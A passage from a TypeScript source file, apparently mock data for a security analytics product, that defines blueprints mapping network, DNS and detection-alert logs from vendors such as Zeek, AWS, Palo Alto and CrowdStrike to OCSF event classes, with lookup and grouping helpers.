      "process.file.hashes.sha256": "regexp_extract(hashes, 'SHA256=([A-F0-9]+)', 1)",
      "actor.user.uid": "user",
      "device.hostname": "computer",
      message: "concat(user, ' launched ', original_file_name)",
      raw_data: RAW,
    },
  }),

  // ── Group 4 · Network Activity (4001) ────────────────────────────────────
  buildBlueprint({
    identifier: "zeek_conn_to_ocsf_network_activity",
    displayName: "Zeek conn.log → OCSF Network Activity",
    sourceParser: "Zeek",
    targetGroupId: "network-activity",
    type: "built-in",
    latestVersion: "Aug 7, 2026, 11:05 AM",
    creator: "Databricks",
    source: {
      id: "zeek-conn",
      kind: "parsed",
      name: "Zeek conn.log",
      table: "lakewatch.silver.zeek_conn",
      records: "6.1M records / 24h",
      fields: [
        { path: "ts", type: "timestamp", sample: "2026-08-20 21:29:41" },
        { path: "id_orig_h", type: "string", sample: "10.2.4.19" },
        { path: "id_orig_p", type: "int", sample: "51544" },
        { path: "id_resp_h", type: "string", sample: "93.184.216.34" },
        { path: "id_resp_p", type: "int", sample: "443" },
        { path: "proto", type: "string", sample: "tcp" },
        { path: "orig_bytes", type: "long", sample: "1240" },
        { path: "resp_bytes", type: "long", sample: "8213" },
        { path: "conn_state", type: "string", sample: "SF" },
      ],
    },
    map: {
      activity_id: "6",
      time: "to_timestamp(ts)",
      "src_endpoint.ip": "id_orig_h",
      "src_endpoint.port": "id_orig_p",
      "dst_endpoint.ip": "id_resp_h",
      "dst_endpoint.port": "id_resp_p",
      "connection_info.protocol_name": "proto",
      "traffic.bytes": "orig_bytes + resp_bytes",
      status_id: "CASE conn_state WHEN 'SF' THEN 1 ELSE 2 END",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "vpc_flow_to_ocsf_network_activity",
    displayName: "AWS VPC Flow Logs → OCSF Network Activity",
    sourceParser: "AWS VPC Flow Logs",
    targetGroupId: "network-activity",
    type: "built-in",
    latestVersion: "Aug 6, 2026, 3:22 PM",
    creator: "Databricks",
    source: {
      id: "aws-vpc-flow",
      kind: "parsed",
      name: "AWS VPC Flow Logs",
      table: "lakewatch.silver.aws_vpc_flow",
      records: "12.4M records / 24h",
      fields: [
        { path: "start_time", type: "timestamp", sample: "2026-08-20 21:28:30" },
        { path: "srcaddr", type: "string", sample: "10.0.3.44" },
        { path: "srcport", type: "int", sample: "42311" },
        { path: "dstaddr", type: "string", sample: "52.94.236.10" },
        { path: "dstport", type: "int", sample: "443" },
        { path: "protocol", type: "int", sample: "6" },
        { path: "bytes", type: "long", sample: "18422" },
        { path: "action", type: "string", sample: "ACCEPT" },
        { path: "interface_id", type: "string", sample: "eni-0abc1234def567890" },
      ],
    },
    map: {
      activity_id: "6",
      time: "to_timestamp(start_time)",
      "src_endpoint.ip": "srcaddr",
      "src_endpoint.port": "srcport",
      "dst_endpoint.ip": "dstaddr",
      "dst_endpoint.port": "dstport",
      "connection_info.protocol_name":
        "CASE protocol WHEN 6 THEN 'tcp' WHEN 17 THEN 'udp' WHEN 1 THEN 'icmp' ELSE cast(protocol as string) END",
      "traffic.bytes": "bytes",
      status_id: "CASE action WHEN 'ACCEPT' THEN 1 ELSE 2 END",
      "device.hostname": "interface_id",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "panw_traffic_to_ocsf_network_activity",
    displayName: "Palo Alto Traffic → OCSF Network Activity",
    sourceParser: "Palo Alto Networks",
    targetGroupId: "network-activity",
    type: "built-in",
    latestVersion: "Aug 4, 2026, 5:47 PM",
    creator: "Databricks",
    source: {
      id: "panw-traffic",
      kind: "parsed",
      name: "Palo Alto Networks Traffic",
      table: "lakewatch.silver.panw_traffic",
      records: "8.9M records / 24h",
      fields: [
        { path: "receive_time", type: "timestamp", sample: "2026-08-20 21:27:15" },
        { path: "source_address", type: "string", sample: "10.2.4.19" },
        { path: "source_port", type: "int", sample: "51544" },
        { path: "destination_address", type: "string", sample: "93.184.216.34" },
        { path: "destination_port", type: "int", sample: "443" },
        { path: "protocol", type: "string", sample: "tcp" },
        { path: "bytes", type: "long", sample: "9453" },
        { path: "action", type: "string", sample: "allow" },
        { path: "device_name", type: "string", sample: "pa-fw-edge-01" },
      ],
    },
    map: {
      activity_id: "6",
      time: "to_timestamp(receive_time)",
      "src_endpoint.ip": "source_address",
      "src_endpoint.port": "source_port",
      "dst_endpoint.ip": "destination_address",
      "dst_endpoint.port": "destination_port",
      "connection_info.protocol_name": "protocol",
      "traffic.bytes": "bytes",
      status_id: "CASE action WHEN 'allow' THEN 1 ELSE 2 END",
      "device.hostname": "device_name",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "cisco_asa_to_ocsf_network_activity",
    displayName: "Cisco ASA → OCSF Network Activity",
    sourceParser: "Cisco ASA",
    targetGroupId: "network-activity",
    type: "custom",
    latestVersion: "Aug 16, 2026, 10:38 AM",
    creator: "You",
    source: {
      id: "cisco-asa",
      kind: "parsed",
      name: "Cisco ASA",
      table: "lakewatch.silver.cisco_asa",
      records: "5.3M records / 24h",
      fields: [
        { path: "event_time", type: "timestamp", sample: "2026-08-20 21:26:02" },
        { path: "src_ip", type: "string", sample: "10.2.4.19" },
        { path: "src_port", type: "int", sample: "51544" },
        { path: "dst_ip", type: "string", sample: "93.184.216.34" },
        { path: "dst_port", type: "int", sample: "443" },
        { path: "protocol", type: "string", sample: "TCP" },
        { path: "bytes", type: "long", sample: "512" },
        { path: "action", type: "string", sample: "Built" },
        { path: "message_id", type: "string", sample: "302013" },
      ],
    },
    map: {
      activity_id: "CASE action WHEN 'Built' THEN 1 WHEN 'Teardown' THEN 2 ELSE 6 END",
      time: "to_timestamp(event_time)",
      "src_endpoint.ip": "src_ip",
      "src_endpoint.port": "src_port",
      "dst_endpoint.ip": "dst_ip",
      "dst_endpoint.port": "dst_port",
      "connection_info.protocol_name": "lower(protocol)",
      "traffic.bytes": "bytes",
      raw_data: RAW,
    },
  }),

  // ── Group 5 · DNS Activity (4003) ────────────────────────────────────────
  buildBlueprint({
    identifier: "zeek_dns_to_ocsf_dns_activity",
    displayName: "Zeek dns.log → OCSF DNS Activity",
    sourceParser: "Zeek",
    targetGroupId: "dns-activity",
    type: "built-in",
    latestVersion: "Aug 7, 2026, 11:05 AM",
    creator: "Databricks",
    source: {
      id: "zeek-dns",
      kind: "parsed",
      name: "Zeek dns.log",
      table: "lakewatch.silver.zeek_dns",
      records: "9.7M records / 24h",
      fields: [
        { path: "ts", type: "timestamp", sample: "2026-08-20 21:25:48" },
        { path: "id_orig_h", type: "string", sample: "10.2.4.19" },
        { path: "id_resp_h", type: "string", sample: "10.2.0.2" },
        { path: "query", type: "string", sample: "login.microsoftonline.com" },
        { path: "qtype_name", type: "string", sample: "A" },
        { path: "rcode_name", type: "string", sample: "NOERROR" },
        { path: "answers", type: "string", sample: "40.126.1.1" },
      ],
    },
    map: {
      activity_id: "2",
      time: "to_timestamp(ts)",
      "src_endpoint.ip": "id_orig_h",
      "dst_endpoint.ip": "id_resp_h",
      "query.hostname": "query",
      "query.type": "qtype_name",
      rcode_id:
        "CASE rcode_name WHEN 'NOERROR' THEN 0 WHEN 'SERVFAIL' THEN 2 WHEN 'NXDOMAIN' THEN 3 ELSE 4 END",
      "answers.rdata": "answers",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "umbrella_dns_to_ocsf_dns_activity",
    displayName: "Cisco Umbrella DNS → OCSF DNS Activity",
    sourceParser: "Cisco Umbrella",
    targetGroupId: "dns-activity",
    type: "built-in",
    latestVersion: "Aug 3, 2026, 1:16 PM",
    creator: "Databricks",
    source: {
      id: "cisco-umbrella-dns",
      kind: "parsed",
      name: "Cisco Umbrella DNS",
      table: "lakewatch.silver.cisco_umbrella_dns",
      records: "7.2M records / 24h",
      fields: [
        { path: "timestamp", type: "timestamp", sample: "2026-08-20 21:24:31" },
        { path: "internal_ip", type: "string", sample: "10.2.4.19" },
        { path: "domain", type: "string", sample: "malware-c2.example" },
        { path: "query_type", type: "string", sample: "A" },
        { path: "action", type: "string", sample: "Blocked" },
        { path: "categories", type: "string", sample: "Malware,Command and Control" },
      ],
    },
    map: {
      activity_id: "2",
      time: "to_timestamp(timestamp)",
      "src_endpoint.ip": "internal_ip",
      "query.hostname": "domain",
      "query.type": "query_type",
      rcode_id: "CASE action WHEN 'Blocked' THEN 5 ELSE 0 END",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "route53_to_ocsf_dns_activity",
    displayName: "AWS Route 53 Resolver → OCSF DNS Activity",
    sourceParser: "AWS Route 53 Resolver",
    targetGroupId: "dns-activity",
    type: "built-in",
    latestVersion: "Aug 6, 2026, 8:44 AM",
    creator: "Databricks",
    source: {
      id: "aws-route53-resolver",
      kind: "parsed",
      name: "AWS Route 53 Resolver Query Logs",
      table: "lakewatch.silver.aws_route53_resolver",
      records: "10.8M records / 24h",
      fields: [
        { path: "query_timestamp", type: "timestamp", sample: "2026-08-20 21:23:12" },
        { path: "srcaddr", type: "string", sample: "10.0.3.44" },
        { path: "query_name", type: "string", sample: "s3.us-west-2.amazonaws.com" },
        { path: "query_type", type: "string", sample: "AAAA" },
        { path: "rcode", type: "string", sample: "NOERROR" },
        { path: "rdata", type: "string", sample: "52.218.1.1" },
        { path: "vpc_id", type: "string", sample: "vpc-0abc1234" },
      ],
    },
    map: {
      activity_id: "2",
      time: "to_timestamp(query_timestamp)",
      "src_endpoint.ip": "srcaddr",
      "query.hostname": "query_name",
      "query.type": "query_type",
      rcode_id: "CASE rcode WHEN 'NOERROR' THEN 0 WHEN 'SERVFAIL' THEN 2 WHEN 'NXDOMAIN' THEN 3 ELSE 4 END",
      "answers.rdata": "rdata",
      "device.hostname": "vpc_id",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "infoblox_dns_to_ocsf_dns_activity",
    displayName: "Infoblox DNS → OCSF DNS Activity",
    sourceParser: "Infoblox",
    targetGroupId: "dns-activity",
    type: "custom",
    latestVersion: "Aug 14, 2026, 4:52 PM",
    creator: "You",
    source: {
      id: "infoblox-dns",
      kind: "parsed",
      name: "Infoblox DNS",
      table: "lakewatch.silver.infoblox_dns",
      records: "4.5M records / 24h",
      fields: [
        { path: "event_time", type: "timestamp", sample: "2026-08-20 21:22:05" },
        { path: "client_ip", type: "string", sample: "10.2.4.19" },
        { path: "qname", type: "string", sample: "updates.acme.com" },
        { path: "qtype", type: "string", sample: "A" },
        { path: "response_code", type: "string", sample: "NOERROR" },
        { path: "answer", type: "string", sample: "10.2.9.14" },
        { path: "view", type: "string", sample: "internal" },
      ],
    },
    map: {
      activity_id: "2",
      time: "to_timestamp(event_time)",
      "src_endpoint.ip": "client_ip",
      "query.hostname": "qname",
      "query.type": "qtype",
      rcode_id:
        "CASE response_code WHEN 'NOERROR' THEN 0 WHEN 'SERVFAIL' THEN 2 WHEN 'NXDOMAIN' THEN 3 ELSE 4 END",
      "answers.rdata": "answer",
      raw_data: RAW,
    },
  }),

  // ── Group 6 · Detection Finding (2004) ───────────────────────────────────
  buildBlueprint({
    identifier: "crowdstrike_detection_to_ocsf_detection_finding",
    displayName: "CrowdStrike Detections → OCSF Detection Finding",
    sourceParser: "CrowdStrike Falcon",
    targetGroupId: "detection-finding",
    type: "built-in",
    latestVersion: "Aug 10, 2026, 9:33 AM",
    creator: "Databricks",
    source: {
      id: "crowdstrike-detections",
      kind: "parsed",
      name: "CrowdStrike Detections",
      table: "lakewatch.silver.crowdstrike_detections",
      records: "1,204 records / 24h",
      fields: [
        { path: "created_timestamp", type: "timestamp", sample: "2026-08-20 21:21:55" },
        { path: "detection_id", type: "string", sample: "ldt:abc123:456789" },
        { path: "name", type: "string", sample: "Suspicious PowerShell Execution" },
        { path: "description", type: "string", sample: "A process spawned an encoded PowerShell command." },
        { path: "severity", type: "int", sample: "70" },
        { path: "status", type: "string", sample: "new" },
        { path: "hostname", type: "string", sample: "FIN-LT-2291" },
        { path: "tactic", type: "string", sample: "Execution" },
      ],
    },
    map: {
      activity_id: "1",
      time: "to_timestamp(created_timestamp)",
      "finding_info.uid": "detection_id",
      "finding_info.title": "name",
      "finding_info.desc": "description",
      severity_id:
        "CASE WHEN severity >= 90 THEN 5 WHEN severity >= 70 THEN 4 WHEN severity >= 50 THEN 3 WHEN severity >= 30 THEN 2 ELSE 1 END",
      status_id: "CASE status WHEN 'new' THEN 1 WHEN 'in_progress' THEN 2 WHEN 'closed' THEN 3 ELSE 0 END",
      "device.hostname": "hostname",
      message: "concat(name, ' (', tactic, ')')",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "defender_alert_to_ocsf_detection_finding",
    displayName: "Microsoft Defender Alerts → OCSF Detection Finding",
    sourceParser: "Microsoft Defender",
    targetGroupId: "detection-finding",
    type: "built-in",
    latestVersion: "Aug 5, 2026, 12:14 PM",
    creator: "Databricks",
    source: {
      id: "defender-alerts",
      kind: "parsed",
      name: "Microsoft Defender Alerts",
      table: "lakewatch.silver.defender_alerts",
      records: "876 records / 24h",
      fields: [
        { path: "alert_creation_time", type: "timestamp", sample: "2026-08-20 21:20:41" },
        { path: "alert_id", type: "string", sample: "da637901234567890123" },
        { path: "title", type: "string", sample: "Ransomware behavior detected" },
        { path: "description", type: "string", sample: "Suspicious file encryption activity was observed." },
        { path: "severity", type: "string", sample: "High" },
        { path: "status", type: "string", sample: "New" },
        { path: "device_name", type: "string", sample: "fin-lt-2291.acme.com" },
        { path: "category", type: "string", sample: "Ransomware" },
      ],
    },
    map: {
      activity_id: "1",
      time: "to_timestamp(alert_creation_time)",
      "finding_info.uid": "alert_id",
      "finding_info.title": "title",
      "finding_info.desc": "description",
      severity_id:
        "CASE severity WHEN 'Informational' THEN 1 WHEN 'Low' THEN 2 WHEN 'Medium' THEN 3 WHEN 'High' THEN 4 ELSE 0 END",
      status_id: "CASE status WHEN 'New' THEN 1 WHEN 'InProgress' THEN 2 WHEN 'Resolved' THEN 3 ELSE 0 END",
      "device.hostname": "device_name",
      message: "concat(title, ' (', category, ')')",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "guardduty_to_ocsf_detection_finding",
    displayName: "AWS GuardDuty → OCSF Detection Finding",
    sourceParser: "AWS GuardDuty",
    targetGroupId: "detection-finding",
    type: "built-in",
    latestVersion: "Aug 6, 2026, 7:19 AM",
    creator: "Databricks",
    source: {
      id: "aws-guardduty",
      kind: "parsed",
      name: "AWS GuardDuty Findings",
      table: "lakewatch.silver.aws_guardduty",
      records: "521 records / 24h",
      fields: [
        { path: "updated_at", type: "timestamp", sample: "2026-08-20 21:19:28" },
        { path: "id", type: "string", sample: "2ab3c4d5e6f7a8b9c0d1e2f3a4b5c6d7" },
        { path: "type", type: "string", sample: "UnauthorizedAccess:EC2/SSHBruteForce" },
        { path: "title", type: "string", sample: "SSH brute force attempts against i-0abc123" },
        { path: "description", type: "string", sample: "203.0.113.24 is performing SSH brute force attacks." },
        { path: "severity", type: "double", sample: "8.0" },
        { path: "resource.instance_id", type: "string", sample: "i-0abc123def456" },
        { path: "region", type: "string", sample: "us-west-2" },
      ],
    },
    map: {
      activity_id: "1",
      time: "to_timestamp(updated_at)",
      "finding_info.uid": "id",
      "finding_info.title": "title",
      "finding_info.desc": "description",
      severity_id:
        "CASE WHEN severity >= 7 THEN 4 WHEN severity >= 4 THEN 3 WHEN severity >= 1 THEN 2 ELSE 1 END",
      status_id: "1",
      "device.hostname": "resource.instance_id",
      "resource.uid": "resource.instance_id",
      message: "type",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "cortex_xdr_to_ocsf_detection_finding",
    displayName: "Cortex XDR Alerts → OCSF Detection Finding",
    sourceParser: "Palo Alto Cortex XDR",
    targetGroupId: "detection-finding",
    type: "custom",
    latestVersion: "Aug 18, 2026, 5:26 PM",
    creator: "You",
    source: {
      id: "cortex-xdr-alerts",
      kind: "parsed",
      name: "Palo Alto Cortex XDR Alerts",
      table: "lakewatch.silver.cortex_xdr_alerts",
      records: "1,033 records / 24h",
      fields: [
        { path: "detection_timestamp", type: "timestamp", sample: "2026-08-20 21:18:14" },
        { path: "alert_id", type: "string", sample: "12345" },
        { path: "alert_name", type: "string", sample: "Behavioral Threat Detected" },
        { path: "description", type: "string", sample: "A process exhibited behavior consistent with credential theft." },
        { path: "severity", type: "string", sample: "high" },
        { path: "resolution_status", type: "string", sample: "STATUS_010_NEW" },
        { path: "host_name", type: "string", sample: "FIN-LT-2291" },
        { path: "mitre_tactic", type: "string", sample: "TA0006" },
      ],
    },
    map: {
      activity_id: "1",
      time: "to_timestamp(detection_timestamp)",
      "finding_info.uid": "alert_id",
      "finding_info.title": "alert_name",
      "finding_info.desc": "description",
      severity_id:
        "CASE severity WHEN 'low' THEN 2 WHEN 'medium' THEN 3 WHEN 'high' THEN 4 WHEN 'critical' THEN 5 ELSE 1 END",
      status_id: "CASE WHEN resolution_status LIKE '%NEW%' THEN 1 WHEN resolution_status LIKE '%RESOLVED%' THEN 3 ELSE 2 END",
      "device.hostname": "host_name",
      message: "concat(alert_name, ' (', mitre_tactic, ')')",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "wiz_issue_to_ocsf_detection_finding",
    displayName: "Wiz Issues → OCSF Detection Finding",
    sourceParser: "Wiz",
    targetGroupId: "detection-finding",
    type: "custom",
    latestVersion: "Aug 20, 2026, 11:58 AM",
    creator: "You",
    source: {
      id: "wiz-issues",
      kind: "parsed",
      name: "Wiz Issues",
      table: "lakewatch.silver.wiz_issues",
      records: "342 records / 24h",
      fields: [
        { path: "created_at", type: "timestamp", sample: "2026-08-20 21:17:03" },
        { path: "id", type: "string", sample: "wiz-9f2a1c3e5d7b" },
        { path: "title", type: "string", sample: "Publicly exposed storage bucket with sensitive data" },
        { path: "description", type: "string", sample: "acme-prod-data is publicly readable and contains PII." },
        { path: "severity", type: "string", sample: "CRITICAL" },
        { path: "status", type: "string", sample: "OPEN" },
        { path: "entity_name", type: "string", sample: "acme-prod-data" },
        { path: "entity_type", type: "string", sample: "BUCKET" },
      ],
    },
    map: {
      activity_id: "1",
      time: "to_timestamp(created_at)",
      "finding_info.uid": "id",
      "finding_info.title": "title",
      "finding_info.desc": "description",
      severity_id:
        "CASE severity WHEN 'LOW' THEN 2 WHEN 'MEDIUM' THEN 3 WHEN 'HIGH' THEN 4 WHEN 'CRITICAL' THEN 5 ELSE 1 END",
      status_id: "CASE status WHEN 'OPEN' THEN 1 WHEN 'IN_PROGRESS' THEN 2 WHEN 'RESOLVED' THEN 3 ELSE 0 END",
      "device.hostname": "entity_name",
      "resource.uid": "entity_name",
      message: "concat(title, ' — ', entity_type)",
      raw_data: RAW,
    },
  }),
]

// ─── Lookups & derived views ────────────────────────────────────────────────

const BLUEPRINTS_BY_ID = new Map(NORMALIZER_BLUEPRINTS.map((bp) => [bp.identifier, bp]))

export function getNormalizerBlueprint(identifier: string): NormalizerBlueprint | undefined {
  return BLUEPRINTS_BY_ID.get(identifier)
}

/** OCSF event class (fields + metadata) backing a data model, keyed by group id. */
export function getOcsfClass(groupId: string): TargetClass | undefined {
  return (TARGET_CLASSES as Record<string, TargetClass>)[groupId]
}

/** All OCSF event classes, in canonical group order. */
export const OCSF_CLASSES: TargetClass[] = (
  [
    "authentication",
    "api-activity",
    "process-activity",
    "network-activity",
    "dns-activity",
    "detection-finding",
  ] as TargetGroupId[]
).map((id) => TARGET_CLASSES[id])

function toRow(bp: NormalizerBlueprint): NormalizerRow {
  return {
    identifier: bp.identifier,
    displayName: bp.displayName,
    sourceParser: bp.sourceParser,
    targetEventClass: bp.targetEventClass,
    type: bp.type,
    latestVersion: bp.latestVersion,
    creator: bp.creator,
  }
}

/** Flat list (kept for search / backwards compatibility). */
export const NORMALIZERS: NormalizerRow[] = NORMALIZER_BLUEPRINTS.map(toRow)

const GROUP_ORDER: TargetGroupId[] = [
  "authentication",
  "api-activity",
  "process-activity",
  "network-activity",
  "dns-activity",
  "detection-finding",
]

/** Normalizers grouped by their OCSF destination event class. */
export const NORMALIZER_GROUPS: NormalizerGroup[] = GROUP_ORDER.map((groupId) => {
  const target = TARGET_CLASSES[groupId]
  return {
    id: target.id,
    name: target.name,
    classUid: target.classUid,
    category: target.category,
    rows: NORMALIZER_BLUEPRINTS.filter((bp) => bp.targetGroupId === groupId).map(toRow),
  }
})
